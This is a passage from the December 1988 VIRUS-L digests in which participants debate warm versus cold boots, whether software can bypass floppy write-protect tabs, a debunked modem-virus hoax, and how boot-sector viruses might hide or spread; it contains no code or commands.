  5417. From: David M. Chess                          CHESS    at YKTVMV
  5418. Subject: Warm boot & thwarting the Brain (PC)
  5419.  
  5420. > How can a virus stay "effective" after a warm boot?
  5421.  
  5422. "Warm boot" just means pressing Ctrl-Alt-Del.   A virus could install
  5423. itself so as to be able to detect when you've pressed those three keys,
  5424. and simulate a boot, leaving itself resident in memory (a boot
  5425. virus discovered at Yale the other month does just that).  So a
  5426. warm boot isn't necessarily safe, because the virus may be watching
  5427. for it.  A cold boot (turning off the power switch) is something
  5428. the virus can't see and simulate!  *8)
  5429.  
  5430. >            This may seem off the wall right now but I think we all
  5431. > need to think of some solution to this "modification of boot record"
  5432. > business, especially because most programs can't treat it like a
  5433. > normal file and hence can't check for any changes to the boot record.
  5434.  
  5435. Programs can read the boot record just as easily (well, almost as
  5436. easily) as they can read the contents of a file.   It wouldn't be
  5437. hard to write a program that would read the boot records, save
  5438. the data to a file, and then periodically compare the current
  5439. contents with the previous one.   I think some of the commercial
  5440. programs do this.  Of course, for true security you have to make
  5441. sure that you are on a "clean" system when you run the check,
  5442. otherwise the virus could be intercepting your "show me the
  5443. boot sector" requests, and lying to you!   (Same goes for checking
  5444. the contents of files, really.)
  5445.  
  5446. DC
  5447.  
  5448. ------------------------------
  5449.  
  5450. Date: Tue, 20 Dec 88 10:56 EST
  5451. From: X-=*REB*=-X <KREBAUM@VAX1.CC.LEHIGH.EDU>
  5452. Subject: Writing with a write protect tab (CP/M & PC)
  5453.  
  5454. I have two points on this subject.  8" disk drives on CP/M (and other)
  5455. systems used what we know as a "write protect" tab as a "write enable"
  5456. tab.   To my knowlege, all 5.25"  drives operate  with "write protect"
  5457. tabs.
  5458.  
  5459. A while  back there was some concern  about diskette manufacturers who
  5460. provided  metallic  write  protect tabs.    This  wouldn't  have  been
  5461. important if a manufacturer  of disk drives (don't  know which one any
  5462. more)  hadn't designed his  write protect circutry  to  use an optical
  5463. sensor.  It seems  that the  circut tried to   reflect light off  of a
  5464. mirror  on the opposite  side of  the  slot where  the   diskette  was
  5465. supposed to go.  This  would have worked under ordinary circumstances.
  5466. But with the metallic - and reflective - write protect tabs, the light
  5467. bounced  back regardless   of the state  of  the  tab.  Thus the  tabs
  5468. provided no measure of safety whatsoever.  This was  before the advent
  5469. of PC's as  we know them today and  I doubt any  of  these drives ever
  5470. made it to current machines.
  5471.  
  5472. Richard Baum
  5473.    ________________________________________________________________
  5474.   /InterNet:kREBaum@Vax1.CC.Lehigh.EDU  BitNet: RB00@Lehigh.Bitnet ",
  5475.  /  SlowNet: 508 E 4th St Suite #1, Bethlehem, PA 18015 215-867-8433",
  5476. /NJ Slownet: 861 Washington Avenue Westwood, NJ 07675   201-666-9207 ",
  5477. "--------------------------------------------------------------------"
  5478. If you'll be my Dixie chicken, I'll be your Tennessee lamb,
  5479. and we can walk together down in Dixie land...
  5480.  
  5481. ------------------------------
  5482.  
  5483. Date: Tue, 20 Dec 88 11:06 EDT
  5484. From: <MANAGER@JHUIGF.BITNET>
  5485. Subject: Write protect tabs (PC & Apple ][e)
  5486.  
  5487. In volume 1 : Issue 53, Steve Woronick <XRAYSROK@SBCCVM.BITNET> writes:
  5488.  
  5489. >   5) About a virus writing on a disk inspite of a write-protect tab,
  5490. >I don't believe it.  I think there must be a misunderstanding
  5491. >somewhere.  I suppose the details of enforcing a write-lock vary, but
  5492. >they all rely on hardware that disables the write-mode of the disk
  5493. >drive.  There is no way software can circumvent this protection,
  5494. >unless your drive is defective and the write-lock-tab feature isn't
  5495. >working properly.
  5496.  
  5497. Well, I don't know about the PC's *you* are using, but I believe it is
  5498. quite possible to circumvent this restriction on certain machines. An
  5499. old pirate friend of mine, a few years back, had his Apple ][e rigged
  5500. so that he could copy things to the backs of disks without cutting a
  5501. notch into it. According to him, it was done from the software end.
  5502. Now, this could be either an exploitation of a since-fixed bug, or
  5503. maybe just bull on his part, but don't rule it out as a possibility.
  5504. (Actually, what we need is someone who knows well the innards of, say,
  5505. disk driver software and that ilk.)
  5506.  
  5507.  
  5508. Damian Hammontree                         EMail:   DAMIAN@JHUIGF.BITNET
  5509. IGF system manager                                MANAGER@JHUIGF.BITNET
  5510. Interactive Graphics Facility
  5511. Johns Hopkins Medical School, Baltimore, MD 21205   Tel: (301) 327-2959
  5512. ==============================================================================
  5513. =="This new learning *amazes* me, Bedevere. Explain to me again how sheep's ==
  5514. =============== bladders may be used to prevent earthquakes..."===============
  5515. ==============================================================================
  5516.  
  5517. ------------------------------
  5518.  
  5519. Date: Tue, 20 Dec 88 11:06:41 CDT
  5520. From: Len Levine <len@evax.milw.wisc.edu>
  5521. Subject: write locking floppies (PC)
  5522.  
  5523. >This topic has been kicked around unconclusively here for some time
  5524. >now, and unless someone can come up with a verifyable and duplicatable
  5525. >method to get around a properly write-protected disk, then I think
  5526. >that we should assume that it is not possible to circumvent.
  5527.  
  5528. Sorry folks, but my technical folks tell me that the write tab on a
  5529. floppy is a soft thing.
  5530.  
  5531. I now get that there is a line from the drive to its controller that
  5532. is high when the disk is write protected.  A switch (this was actually
  5533. done) in that line can emulate a write locked or unlocked state
  5534. independent of a tab on the disk.  Thus, at the drive level, the
  5535. protection is not hardware.
  5536.  
  5537. My people tell me that the controller merely sets an interrupt when an
  5538. attempt is made to write to a locked disk.  They feel, but have not
  5539. tested, that an attempt to write around the bios can ignore this
  5540. interrupt.  If they are right, there is no such thing as a write
  5541. locked disk in the pc environment.
  5542.  
  5543. They also tell me that the controller ROM is loaded into RAM at boot
  5544. time, and may be reloaded by the processor during program execution.
  5545. I am not sure what this implies but it seems to improve the chances
  5546. that a change in the driver will be corrected from time to time.
  5547.  
  5548. I think the question is very very open.
  5549.  
  5550. + - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - +
  5551. | Leonard P. Levine               e-mail len@evax.milw.wisc.edu |
  5552. | Professor, Computer Science             Office (414) 229-5170 |
  5553. | University of Wisconsin-Milwaukee       Home   (414) 962-4719 |
  5554. | Milwaukee, WI 53201 U.S.A.              Modem  (414) 962-6228 |
  5555. + - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - +
  5556.  
  5557. ------------------------------
  5558.  
  5559. Date:     Tue, 20 Dec 88 14:58 EDT
  5560. From:     <MJBURGE@OWUCOMCN.BITNET>
  5561. Subject:  Write Protection on the Apple II series
  5562.  
  5563.         On the Apple IIe series computers, one can enable or diable
  5564. write protect checking via simple software switch.  Disk writing
  5565. routines are available in the Disk Controller card, and can be
  5566. accessed from the machine level easily.  The entire disk writing
  5567. operation is trivial and well documented at least one magazine,
  5568. Hardcore Computist, has published complete source for the Disk
  5569. Controller, as well as all pertinent information for their usage.
  5570. Hope this helps somewhat.  Even if it is information for the Apple II
  5571. series.
  5572.  
  5573.                                         Mark James Burge
  5574.                                         MJBURGE@OWUCOMCN.BITNET
  5575.  
  5576. ------------------------------
  5577.  
  5578. Date: Tue, 20 Dec 1988 15:42:12 EST
  5579. From: Ken van Wyk <luken@spot.CC.Lehigh.EDU>
  5580. Subject: IBM BIOS ROM source listing of disk write (PC)
  5581.  
  5582. Ok folks, all this talk about floppy disk write protect tabs is
  5583. getting nowhere quickly.  I have the IBM Personal Computer Technical
  5584. Reference manual right here in front of me, and I'm looking at the
  5585. disk i/o portions of the 8088 assembly language source code to the ROM
  5586. BIOS (page 5-68 in this revision of the manual)...
  5587.  
  5588. When writing to floppy disk, the code instructs the disk controller to
  5589. perform the write sequence, and *THEN* it checks to see whether that
  5590. failed due to (among other things) a write protect situation.  That
  5591. sure indicates (to me at least) that the write protection is done in
  5592. hardware, or at least, if it is in software, then the software is
  5593. isolated in the disk controller or disk drive itself.
  5594.  
  5595. This issue of VIRUS-L has sure seen a lot of discussion on write
  5596. protect tabs...  However, I remain convinced that the write protection
  5597. is supplied via hardware (or at least via software/firmware local to
  5598. the controller or to the disk drive itself) until anyone can send me a
  5599. few lines of MASM code that will write to a properly functioning
  5600. write-protected floppy disk.  Any takers?
  5601.  
  5602. Ken
  5603.  
  5604. ------------------------------
  5605.  
  5606. End of VIRUS-L Digest
  5607. *********************VIRUS-L Digest            Wednesday, 21 Dec 1988        Volume 1 : Issue 55
  5608.  
  5609. Today's Topics:
  5610. Warm vs. Cold boots
  5611. Re: software override of write protect tabs?
  5612. Vendor Viruses
  5613. Re: dangers of distributing software (PC & General)
  5614. Re: Can virus be placed on blank formatted disk? (PC)
  5615.  
  5616. ---------------------------------------------------------------------------
  5617.  
  5618. Date:     Tue, 20 Dec 88 19:24 EST
  5619. From:     <ACS045@GMUVAX.BITNET>
  5620. Subject:  Warm vs. Cold boots
  5621.  
  5622.  
  5623. >From: "Michael J. Steiner  " <U23405@UICVM.BITNET>
  5624. >Subject:  Cold boot vs. warm boot... (PC)
  5625. >
  5626. >How can a virus stay "effective" after a warm boot? Aren't both kinds of
  5627. >boots the same? (Evidently, there must be differences; what are they?)
  5628. >                                             Michael Steiner
  5629. >                                             Email: U23405@UICVM.BITNET
  5630.  
  5631. Warm boots and cold boots differ in the amount of memory they clear
  5632. when they are executed.  A cold boot is considered to be when the
  5633. machine's power is cut, and then turned back on be it by flipping the
  5634. switch, pulling the plug or whatever other metaphor/method you want to
  5635. toss in here.  A warm boot is simply a reset which can be done by
  5636. issuing a system command, pressing an interrupt/ reset switch or
  5637. whatever.
  5638.  
  5639. The point is that with a warm boot, the system still has power, so
  5640. some areas of memory can retain data, even though much of it is
  5641. cleared. Thus, it is conceivable that a virus could survive a warm
  5642. boot if it was off in a secluded/ non-general area of memory.  Usually
  5643. when a warm boot occurs, the only thing that is cleared is main memory
  5644. and lots of pointers and tables are reset.  Special caches, ram-disks,
  5645. clock/calendar memory, all normally retain their contents prior to the
  5646. warm boot.
  5647.  
  5648. - ------------------
  5649. Steve Okay ACS045@GMUVAX.BITNET/acs045@gmuvax2.gmu.edu/CSR032 on The Source
  5650.  
  5651.                         "Chipmunks roasting over an open fire,
  5652.                          Jack Frost ripping up your nose..."
  5653.  
  5654. ------------------------------
  5655.  
  5656. Date: Tue, 20 Dec 88 21:39:05 CST
  5657. From: <MATHRICH@UMCVMB.BITNET>
  5658. Subject: Re: software override of write protect tabs?
  5659.  
  5660. In my IBM tech reference, in the section for the diskette drive: "If
  5661. the diskette is write-protected, a write protect sensor disables the
  5662. drive's circuitry, and an appropriate signal is sent to the interface
  5663. (diskette controller)."
  5664.  
  5665. Also:
  5666. "The write protect sensor disables the diskette drive's electronics
  5667. whenever a write protect tab is applied to the diskette."
  5668.  
  5669. In the section on the diskette adapter:
  5670. "Write Enable line (from the adapter to the drive): The drive disables
  5671. write current in the head unless this line is active."
  5672.  
  5673. In the schematics in back, the diagram for the diskette drive has the
  5674. Write Protect sensor (on the drive) and the Write Enable line (from
  5675. the controller) wired in such a way that WP must be false and WE must
  5676. be true in order for a logic 0 to be applied to a pin of some mystery
  5677. IC.  I'm not an electronics expert, but it seems likely to me that the
  5678. drive won't let the controller override the WP switch.  If this is
  5679. true, then there's no way for software to override it either.
  5680.  
  5681. Rich
  5682.  
  5683. ------------------------------
  5684.  
  5685. Date:  Tue, 20 Dec 88 23:59 EST
  5686. From:  WHMurray@DOCKMASTER.ARPA
  5687. Subject:  Vendor Viruses
  5688.  
  5689. >   two issues back in pc magazine, john dvorak wrote an article
  5690. >pertaining to the issue of software manufacturers imbedding viruses
  5691. >in their applications.
  5692. >   he stated that many companies are doing this to sort of 'do away
  5693. >with the competition'. the virus writes itself to the boot disk and
  5694. >when booted up searches for the competition. if found, it does some
  5695. >damage.
  5696. [Hypothetical omitted.]
  5697.  
  5698. >   i hope that software (as well as hardware) manufactureres do not
  5699. >continue implenting viruses to monopolize the market. heaven knows we small
  5700. > at users will have to program our own applications!
  5701. >   swifty LeBard OO--=+
  5702.  
  5703. It is Mr. Dvorak's style to be provocative.  In the interest of that
  5704. style he often crosses the line between reporting and speculating.  I
  5705. am not aware of any evidence that this assertion of his is any more
  5706. substantial than any of his others.  While we do not seem to have
  5707. discovered any sanctions to discourage the rude, disorderly, impolite,
  5708. and irresponsible behavior of the non-professionals in our midst, you
  5709. can be sure that the market would mete prompt and effective sanctions
  5710. against vendors behaving in such a manner.
  5711.  
  5712. There are a few anecdotes in other markets of firms that tried to
  5713. trash the reputations of their competitors.  Most of these backfired,
  5714. but none are recorded to have been successful.  There is no reason to
  5715. believe that this market is any different.
  5716.  
  5717. Only users have a greater interest in an orderly marketplace than do
  5718. vendors.  Vendors seem to have a better idea of where their real
  5719. interests rest.
  5720.  
  5721. You need not hope idly for the end of a practice for which the only
  5722. evidence of its existence is sensational assertion.
  5723.  
  5724.  
  5725. William Hugh Murray, Fellow, Information System Security, Ernst & Whinney
  5726. 2000 National City Center Cleveland, Ohio 44114
  5727. 21 Locust Avenue, Suite 2D, New Canaan, Connecticut 06840
  5728.  
  5729. ------------------------------
  5730.  
  5731. Date:         Wed, 21 Dec 88 06:26:59 EST
  5732. From:         "Homer W. Smith" <CTM@CORNELLC.BITNET>
  5733. Subject:      Re: dangers of distributing software (PC & General)
  5734.  
  5735. >   1) Disks containing only source code are *not* absolutely safe, but
  5736. >they would be much safer, in my opinion, if carefully examined.  There
  5737. >is nothing to prevent a virus or some such thing from writing hidden
  5738. >files or storing things in "bad" sectors where the average person
  5739. >doing a DIR wouldn't see them.  Furthermore, a virus could write the
  5740. >essential part of itself onto the boot sector (like brain does) and
  5741. >wait for someone to boot their system with the disk in place, at which
  5742. >time it could become active.
  5743.  
  5744.      This assumes the disk is bootable?  I am sending out disks
  5745. with NOTHING on them but copied ascii files using the dos copy
  5746. command.  They are formated with the format command and then
  5747. copied.  No system.  What dangers remain?
  5748.  
  5749.      Homer
  5750.  
  5751. ------------------------------
  5752.  
  5753. Date:         Wed, 21 Dec 88 06:44:57 EST
  5754. From:         "Homer W. Smith" <CTM%CORNELLC.BITNET@IBM1.CC.Lehigh.Edu>
  5755. Subject:      Re: Can virus be placed on blank formatted disk? (PC)
  5756.  
  5757. >From:         Joe Simpson <JS05STAF@MIAMIU.BITNET>
  5758. >Subject:      MS-DOS and write protected diskettes
  5759. >
  5760. >1.  Media susceptible to virus attack.
  5761. >    Formatted MS-DOS diskettes with or without an operating system
  5762. >    have a boot block.  Some viruses, including Brain, can subvert
  5763. >    this boot block and use it as a vector for infection.  Some
  5764. >    viruses also can survive a warm boot.  Thus it is quite possible
  5765. >    for a disk containing only Fortran source code to be infected.
  5766. >    This can happen while DOS as we know it is active, or after an
  5767. >    attempt to warm boot the diskette on an infected computer.
  5768.  
  5769.      Still not clear on this.  If I put a fresh floppy in the A drive
  5770. and format it, can the virus be laid down on the floppy at this time?
  5771. If I then copy files from the C drive, can the virus be laid down at
  5772. this time?
  5773.  
  5774.      If I attempt to warm boot the machine with the empty floppy in
  5775. place, this results in a failure to boot of course, but can the virus
  5776. be laid down at this time?
  5777.  
  5778.      Let's say the floopy gets infected.  How can it then infect
  5779. another machine?  During a warm or cold boot with the floppy in
  5780. place (causing boot failure)?
  5781.  
  5782.      If the floppy is infected must it have bad sectors?  Won't
  5783. checkdsk find this out?  If the disk has no bad sectors, does this
  5784. mean the floppy is clean of all or just certain viruses?
  5785.  
  5786.      The implication in a past posting is that some brain viruses
  5787. will cause debug to not execute properly d0:0.  Is this the boot
  5788. sector?  And is this correct about brain?
  5789.  
  5790.      Homer
  5791.  
  5792. ------------------------------
  5793.  
  5794. End of VIRUS-L Digest
  5795. *********************
  5796.  
  5797. VIRUS-L Digest            Wednesday, 21 Dec 1988        Volume 1 : Issue 56
  5798.  
  5799. Today's Topics:
  5800. followup on alleged modem virus (PC)
  5801. File: Misc. Notes: Virus Listings / Pc Mag Article
  5802. Write protect circuitry on Apple II line
  5803. Re: Can virus be placed on blank formatted disk? (PC)
  5804. Write Protect Gritch
  5805. Can virus be placed on a blank formatted disk? (PC)
  5806. Nightline virus program
  5807. Questions about the Hard Drive (PC)
  5808. You can't fool the write protect line w/software (PC)
  5809. virus in bad sectors of an unbootable floppy (PC)
  5810. Problems with commercial software (PC)
  5811.  
  5812. ---------------------------------------------------------------------------
  5813.  
  5814. Date: Wed, 21 Dec 1988 9:11:09 EST
  5815. From: Ken van Wyk <luken@spot.CC.Lehigh.EDU>
  5816. Subject: followup on alleged modem virus (PC)
  5817.  
  5818. It's been brought to my attention that the report of a modem virus
  5819. here on VIRUS-L a couple weeks ago was a hoax.  After looking at the
  5820. original announcement of the virus, I'm inclined to agree with that.
  5821. Specifically:
  5822.  
  5823. > TIME:  TUE 10-04-88  03:17:41
  5824. > FROM:  MIKE ROCHENLE
  5825. > TO:    ALL
  5826. > SUBJ:  Really nasty virus
  5827. > AREA:  GENERAL (1)
  5828. >
  5829. >    I've just discovered probably the world's worst computer virus yet.
  5830. > ...[Body of text deleted]
  5831. > do now is to stick to 1200 baud until we figure this thing out.
  5832. >
  5833. >                                         Mike RoChenle
  5834.  
  5835. In addition to the fact that the reported virus is highly incredible,
  5836. as was pointed out by several of our readers, it's even more unlikely
  5837. that someone would have the name Mike RoChenle (read: Micro Channel).
  5838. Thus, unless someone can come forward with some substantial evidence
  5839. on this matter, I'd like for everyone to assume that the reported
  5840. virus was a hoax.
  5841.  
  5842. Obviously, I can't follow up on every message that gets sent to
  5843. VIRUS-L, but I would like to ask all persons submitting messages,
  5844. particularly when forwarding messages from other sources (as was the
  5845. case here), to confirm their sources of information, within reason.  I
  5846. certainly don't want VIRUS-L to become a source of disinformation, and
  5847. I'm sure that the readers don't want that either.
  5848.  
  5849. Thanks in advance for everyone's cooperation on this.  Oh, and Happy
  5850. Holidays to all!
  5851.  
  5852. Ken
  5853.  
  5854. ------------------------------
  5855.  
  5856. Date:         Wed, 21 Dec 1988 09:31 EST
  5857. From:         [Ed. No From: field, I assume this is from J.D. Abolins?]
  5858. Subject:      File: Misc. Notes: Virus Listings / Pc Mag Article
  5859.  
  5860. VIRUS LISTINGS: Brett Ingerman and anybody else interested in
  5861.  compiling a virus "Dirty Dozen", let's keep in contact. Pam Kane
  5862.  is putting up a message on Delphi in order to find out how to
  5863.  contact Eric Newhouse. I still needto cull together some tools
  5864.  for desinating the cases on the listing so that the listing does
  5865.  drive university and other institutional public relations people
  5866.  up the wall.
  5867.  
  5868.  A possible format for a listing would a "neutral" identifier followed
  5869.  by the various names the virus is called. Then the symptoms and any
  5870.  particular qualities it may have. If the recovery procedure have any
  5871.  special indications, these would be mentioned with the listing for the
  5872.  virus. At the end of the listing would be general recovery procedures.
  5873.  
  5874. PC MAG ARTICLE: Recently somebody mentioned that John Dvorak's column
  5875.  of a few months ago claimed that software writers were already using
  5876.  viruses to attack competitors' products. From my recollections, the
  5877.  gave this as a hypothetical future scenario, not as a statement of
  5878.  current practice. While there have case were virus code was considered
  5879.  as a means of dealing with piracy and copyright infringement, no
  5880.  major "virus wars" are going on for now. (I have heard reports of
  5881.  immature BBS SysOps sabotaging eachother's systems with Trojans and
  5882.  viruses, but that's a different matter.)
  5883.  
  5884. ------------------------------
  5885.  
  5886. Date:         Wed, 21 Dec 88 08:27:39 EST
  5887. From:         Joe Simpson <JS05STAF@MIAMIU.BITNET>
  5888. Subject:      Write protect circuitry on Apple II line
  5889.  
  5890. Apple 2 5.25 inch drives had circuit level protection for disk drive
  5891. write protection.  Many people installed switches on the drive to
  5892. circumvent this.
  5893.  
  5894. ------------------------------
  5895.  
  5896. Date:         Wed, 21 Dec 88 09:15:15 EST
  5897. From:         "Christian J. Haller" <CJH@CORNELLA.ccs.cornell.edu>
  5898. Subject:      Re: Can virus be placed on blank formatted disk? (PC)
  5899.  
  5900. >Date:         Wed, 21 Dec 88 06:44:57 EST
  5901. >From:         "Homer W. Smith" <CTM@CORNELLC.BITNET>
  5902. >     Still not clear on this.  If I put a fresh floppy in the A drive
  5903. >and format it, can the virus be laid down on the floppy at this time?
  5904.  
  5905. Yes, if your FORMAT command has been subverted by a virus.
  5906.  
  5907. >If I then copy files from the C drive, can the virus be laid down at
  5908. >this time?
  5909.  
  5910. Yes, if your COPY or DISKCOPY or XCOPY command has been subverted.
  5911.  
  5912. >     If I attempt to warm boot the machine with the empty floppy in
  5913. >place, this results in a failure to boot of course, but can the virus
  5914. >be laid down at this time?
  5915.  
  5916. Yes, if the warm boot key sequence has been trapped and subverted.
  5917. There is a BIOS call that generates a warm boot without clearing
  5918. active memory.  There is no corresponding key combination that can
  5919. produce this, but a program can do it easily.
  5920.  
  5921. >     Let's say the floopy gets infected.  How can it then infect
  5922. >another machine?  During a warm or cold boot with the floppy in
  5923. >place (causing boot failure)?
  5924.  
  5925. Yes, either one.  The boot sector of the floppy is small, but can easily
  5926. point to someplace in memory, which could survive an apparent warm boot,
  5927. or to some obscure file on a hard disk, which could survive a cold boot.
  5928.  
  5929. >     If the floppy is infected must it have bad sectors?  Won't
  5930. >checkdsk find this out?  If the disk has no bad sectors, does this
  5931. >mean the floppy is clean of all or just certain viruses?
  5932.  
  5933. With only a boot sector's worth of space, a virus couldn't be very
  5934. elaborate.  A floppy-based virus would probably have info stored in
  5935. bad sectors, like Brain, but not necessarily.  Given complete control
  5936. of the File Allocation Table, a virus could hide its presence by
  5937. appearing to be junk in unused sectors at the end of the diskette.
  5938. Given complete control of the disk controller hardware and its pattern
  5939. of representation in memory, other things may be possible, like writing
  5940. between the formatted sectors on the diskette, or outside the pattern
  5941. of formatted tracks.  The PC system is more full of holes than Swiss
  5942. cheese, and I expect the same goes for other kinds of systems too.
  5943.  
  5944. >     The implication in a past posting is that some brain viruses
  5945. >will cause debug to not execute properly d0:0.  Is this the boot
  5946. >sector?  And is this correct about brain?
  5947.  
  5948. I don't know about Brain's location in memory, but you could take a look
  5949. at the chapter on memory in the MS-DOS Encyclopedia in our Software
  5950. Lending Library, 126 CCC, Homer.  Too bad you missed my talk on viruses.
  5951.  
  5952. - -Chris Haller
  5953. Acknowledge-To: <CJH@CORNELLA>
  5954.  
  5955. ------------------------------
  5956.  
  5957. Date: Wed, 21 Dec 88 09:43:09 EST
  5958. From: Don Alvarez <boomer@space.mit.edu>
  5959. Subject: Write Protect Gritch
  5960.  
  5961.     OK gang, we're now up to 547 comments on write protect tabs.
  5962.     99.9% of these took the form of either "somebofy told me it was
  5963.     hardware" or "somebody told me it was software." I may have missed
  5964.     one, but near as I can recall, the ONLY PERSON who actually did
  5965.     his homework right was our fearless leader, Ken.
  5966.  
  5967.     I know Ken doesn't like people flaming on the list, so maybe I'll
  5968.     get booted for saying this, but PLEASE, if somebody asks a question
  5969.     which has a simple, yes or no answer, and you want to respond with
  5970.     an nth generation rumor of unknown origin, keep it short, because
  5971.     a thousand people or more are going to have to take the time to
  5972.     read what you say.  Better yet, if you want to respond to it,
  5973.     be an experimentalist like ken and read the manual or write a piece
  5974.     of code or something.
  5975.  
  5976.                         *Flame off*
  5977.                            - Don
  5978.  
  5979.      + ----------------------------------------------------------- +
  5980.      |   Don Alvarez               MIT Center For Space Research   |
  5981.      |   boomer@SPACE.MIT.EDU      77 Massachusetts Ave   37-618   |
  5982.      |   (617) 253-7457            Cambridge, MA 02139             |
  5983.      + ----------------------------------------------------------- +
  5984.  
  5985. ------------------------------
  5986.  
  5987. Date:         Wed, 21 Dec 88 08:53:38 EST
  5988. From:         Joe Simpson <JS05STAF@MIAMIU.BITNET>
  5989. Subject:      Can virus be placed on a blank formatted disk? (PC)
  5990.  
  5991. I'm sorry I was not clear.  Viruses are a lot like game theory from hell.
  5992.  
  5993. 1.  Places for viruses to remain dormant.
  5994.     If it's magnetic and fits in the drive it can be infected.
  5995. 2.  Places for viruses to be active.
  5996.     As far as I know there is only one place for a to
  5997.     be active.  That is the computers primary store, where instructions
  5998.     can be fetched and interpreted by the CPU.  For most PC's this means
  5999.     ram.  Note that the ram may be battery backed up!  If it is not,
  6000.     then removing power from this ram is the ONLY safe way to kill an
  6001.     active virus image.
  6002. 3.  How a virus activates.
  6003.     As far as I know, all viruses are activated by inserting virus activation
  6004.     code in software routinely executed by the PC.  Obvious places for this
  6005.     are the boot block of a floopy, with or without DOS on it, the DOS
  6006.     hooks where reading and writing take place, and the keyboard interrupt
  6007.     hook.
  6008. 4.  My conclusions.
  6009.     If you have an active ram based image of a virus in your system,
  6010.     it can do anything it has been programmed to accomplish, including
  6011.     writing on any magnetic media it wants to.  NOTE:  Thanks to Ken's
  6012.     rigorous inclinations, I feel comfortable in declaring that viruses
  6013.     don't have access to write protected floppies on IBM PC's  (old 5.25
  6014.     style machines).
  6015. 5.  What can you do?
  6016.     Pray
  6017.     Run protection software like FluShot for partial protection.
  6018.     Routinely check your hard disk for infection.
  6019.     Sample floppies to check for virus infection.
  6020.     Get a lawyer to write an obnoxiious, unfair, and effective statement
  6021.     of limited liability.
  6022.  
  6023. ------------------------------
  6024.  
  6025. Date: Wed, 21 Dec 88 10:06:28 -0500 (EST)
  6026. From: Leslie Burkholder <lb0q+@andrew.cmu.edu>
  6027. Subject: Nightline virus program
  6028.  
  6029. Did anyone tape the Ted Koppel Nightline program on viruses (for
  6030. deferred viewing) run on 10 November? Please reply to
  6031. lb0q@andrew.cmu.edu, rather than the list.
  6032. Thanks,
  6033. Leslie Burkholder
  6034.  
  6035. ------------------------------
  6036.  
  6037. Date:         Wed, 21 Dec 88 10:22:07 EDT
  6038. From:         Swifty LeBard <FALL8076@PACEVM.BITNET>
  6039. Subject:      Questions about the Hard Drive (PC)
  6040.  
  6041. Query: What can any of the known viruses do to the Hard Disk?
  6042.        Can they actually disrupt data,  or even damage the drive?
  6043.        It now seems that the viruses can actually infect write-protected
  6044.        diskettes, how will this effect the hardware of the Hard Disk?
  6045.  
  6046.   I also want to thank Christian J. Haller for his info. I learned
  6047.    a lot from it! (I just joined virus-l).
  6048.    +------------------------+
  6049.    |  O                     |
  6050.    | ~|\o-#   Swifty LeBard |
  6051.    | //                     |
  6052.    +------------------------+
  6053.  
  6054. [Ed. Oh no...  Take a look at the following message from Richard Baum
  6055. and John Hunt; write-protection is done in hardware.]
  6056.  
  6057. ------------------------------
  6058.  
  6059. Date: Wed, 21 Dec 88 11:40 EST
  6060. From: X-=*REB*=-X <KREBAUM@VAX1.CC.LEHIGH.EDU>
  6061. Subject: You can't fool the write protect line w/software (PC)
  6062.  
  6063. According to the  circut diagram  from IBM   for  IBM  5.25"  diskette
  6064. drives, (From the logic diagram section in the IBM technical reference
  6065. guides) the write  protect mechanism is a  hardware  device that takes
  6066. its input from the write protect switch.  Normally, the switch remains
  6067. closed. When a write protect tab is placed in front of the switch, the
  6068. switch is  opened.  Then, the   erase line and the  write  signals are
  6069. disabled.  This  is directly  controlled by  the   switch.  There is a
  6070. provision  for  this  to be jumpered  so  that  the  drive permanently
  6071. ignores the write protect switch.  Thus, all the talk recently of this
  6072. being controlled by software is incorrect.
  6073.  
  6074. Richard Baum & John Hunt
  6075.  
  6076. PS: We have not examined the circut diagrams for 3.5" drives,  but  we
  6077.     assume that they work in a similar fashion.
  6078.    ________________________________________________________________
  6079.   /InterNet:kREBaum@Vax1.CC.Lehigh.EDU  BitNet: RB00@Lehigh.Bitnet ",
  6080.  /  SlowNet: 508 E 4th St Suite #1, Bethlehem, PA 18015 215-867-8433",
  6081. /NJ Slownet: 861 Washington Avenue Westwood, NJ 07675   201-666-9207 ",
  6082. "--------------------------------------------------------------------"
  6083. If you'll be my Dixie chicken, I'll be your Tennessee lamb,
  6084. and we can walk together down in Dixie land...
  6085.  
  6086. [Ed. Thanks guys!  The only possible weak link then would be a
  6087. malfunctioning write-protect sensor (normally an optic sensor, I
  6088. believe).  If the light to the sensor passes through the tab due to
  6089. a tab being not opaque enough, then I'd assume that the drive might
  6090. believe that the drive is ok to write to.  Likewise, if the light is
  6091. sent and detected on the same side of the disk via a reflector on the
  6092. other side, and if the write-protect tab itself is reflecting light,
  6093. then the detector might get an incorrect signal.
  6094.  
  6095. The solution, of course, is to use black non-reflecting write-protect
  6096. tabs, and to trust the hardware to do its job.
  6097.  
  6098. Let us all hope that this issue has been cleared up once and for all.
  6099. Thanks to everyone who helped out!]
  6100.  
  6101. ------------------------------
  6102.  
  6103. Date:     Wed, 21 Dec 88 11:24:26 EST
  6104. From:     Jefferson Ogata (me!) <OGATA@UMDD.BITNET>
  6105. Subject:  virus in bad sectors of an unbootable floppy (PC)
  6106.  
  6107. There's no harm in a virus hanging out in "bad" sectors of an
  6108. unbootable, source-only floppy; the virus cannot be invoked.  Even if
  6109. an executable is copied to the disk later, it won't be linked with the
  6110. virus in any way.  All a virus can do by putting itself on bad sectors
  6111. is take up disk space, since nothing will ever read memory from those
  6112. sectors.  The only danger will be if the virus is also in the boot
  6113. block somehow.
  6114.  
  6115. If the disk is bootable, or has an infected executable, then either of
  6116. those programs could load the virus off the bad sectors.
  6117.  
  6118. I don't know the format of the boot record, but if IBM did things with
  6119. their customary stupidity, the OS loads a boot program off the block
  6120. and attempts to execute, regardless of whether there was a boot
  6121. program actually on the disk.  However, I give them credit for having
  6122. done something different, because if you try to boot a non-system
  6123. disk, it behaves in a predictable manner.  So either the formatter
  6124. puts a program on the boot block that prints the message: Non-system
  6125. disk, etc., or the OS looks at the boot record and sees that there's
  6126. no boot program there.
  6127.  
  6128. Putting an unfunctional boot program there would allow virus infection
  6129. of an unbootable diskette, since the virus could hook up to the boot
  6130. program.  Any time you did a warm boot, the virus would get executed
  6131. and then you'd see the non-system disk message.  This would have been
  6132. a stupid design decision for (among others) precisely this reason.
  6133.  
  6134. Having the OS check for a boot program is a tougher situation for the
  6135. virus.  In this case, there is a magic number or some other indication
  6136. of whether a program is residing on this block.  The OS checks this
  6137. indicator and performs accordingly.  A virus could still infect an
  6138. unbootable disk by jumping on the boot block and pretending it's a
  6139. boot program, but in order to be inconspicuous it would have to then
  6140. print out a non-system disk message and wait for the user to load a
  6141. new disk.  I haven't heard of any virus that does this.
  6142.  
